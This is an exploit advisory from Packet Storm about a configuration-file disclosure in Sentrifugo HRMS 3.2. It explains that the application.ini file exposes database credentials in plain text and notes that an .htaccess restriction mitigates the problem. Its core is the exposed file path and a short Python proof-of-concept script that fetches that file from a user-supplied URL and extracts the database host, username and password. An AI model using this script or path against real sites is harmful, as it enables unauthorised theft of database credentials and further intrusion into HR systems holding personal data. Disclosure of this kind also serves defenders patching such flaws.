Sentrifugo Human Resource Management System 3.2 File Disclosure

2019-05-01T00:00:00
ID PACKETSTORM:152700
Type packetstorm
Reporter KingSkrupellos
Modified 2019-05-01T00:00:00

Description

                                        
                                            `######################################################################  
  
# Exploit Title : Sentrifugo Human Resource Management System 3.2  
Database Configuration Disclosure  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 02/05/2019  
# Vendor Homepage : sentrifugo.com  
# Software Download Link : sentrifugo.com/downloadzip/1556734875  
github.com/sapplica/sentrifugo/archive/master.zip  
# Software Affected Versions : 1.1.1 - 1.1.7 - 2.0.1 Beta - 2.1.1 -  
3.1.1 and 3.2  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Vulnerability Type :  
CWE-16 [ Configuration ]  
CWE-200 [ Information Exposure ]  
CWE-538 [ File and Directory Information Exposure ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
######################################################################  
  
# Information about Software :  
***************************  
Sentrifugo is a FREE and powerful Human Resource Management System  
  
(HRMS) that can be easily configured to meet your organizational needs.  
  
#####################################################################  
  
# Impact :  
***********  
Sentrifugo Human Resource Management System 3.2 configuration file may  
potentially  
  
disclose sensitive information to remote attackers.  
  
The username and password of the database may be obtained trough the  
"application.ini" file.  
  
This is going to have an impact on confidentiality, integrity, and availability.  
  
The configuration file unintentionally stored in  
/application/configs/application.ini  
  
HTTP requests consisting of a single character will cause the software  
to disclose sensitive  
  
configuration information, including the password/database to the  
administrative web interface.  
  
This file is installed, by default, with world readable and possibly  
world writeable permissions enabled.  
  
This may have some potentially serious consequences as the configuration file  
  
also stores password information in plain text.  
  
This issue occurs because access controls on configuration files are  
not properly set.  
  
An attacker can exploit this issue to retrieve potentially sensitive  
information.  
  
Attackers can access config file via URL request. This may aid in  
further attacks.  
  
The access to the /configs directory should be restricted with an adequate  
  
countermeasure by the use of a .htaccess file.  
  
* The product stores sensitive information in files or directories  
that are accessible to actors  
  
outside of the intended control sphere.  
  
* An information exposure is the intentional or unintentional  
disclosure of information to an actor  
  
that is not explicitly authorized to have access to that information.  
  
Installation Guide for Windows - Linux - MacOSX =>  
sentrifugo.com/installation-guide  
  
#####################################################################  
  
# Database Configuration File Disclosure Exploit :  
*******************************************  
/application/configs/application.ini  
  
Information :  
*************  
resources.db.adapter = PDO_MYSQL  
resources.db.params.host = SENTRIFUGO_HOST  
resources.db.params.username = SENTRIFUGO_USERNAME  
resources.db.params.password = SENTRIFUGO_PASSWORD  
resources.db.params.dbname = SENTRIFUGO_DBNAME  
resources.db.isDefaultTableAdapter = true  
  
Exploit - Proof of Concept :  
**************************  
#!/usr/bin/python  
import string  
import re  
from urllib2 import Request, urlopen  
disc = "/application/configs/application.ini"  
url = raw_input ("URL: ")  
req = Request(url+disc)  
rta = urlopen(req)  
print "Result"  
html = rta.read()  
rdo = str(re.findall("resources.*=*", html))  
print rdo  
exit  
  
#####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#####################################################################  
`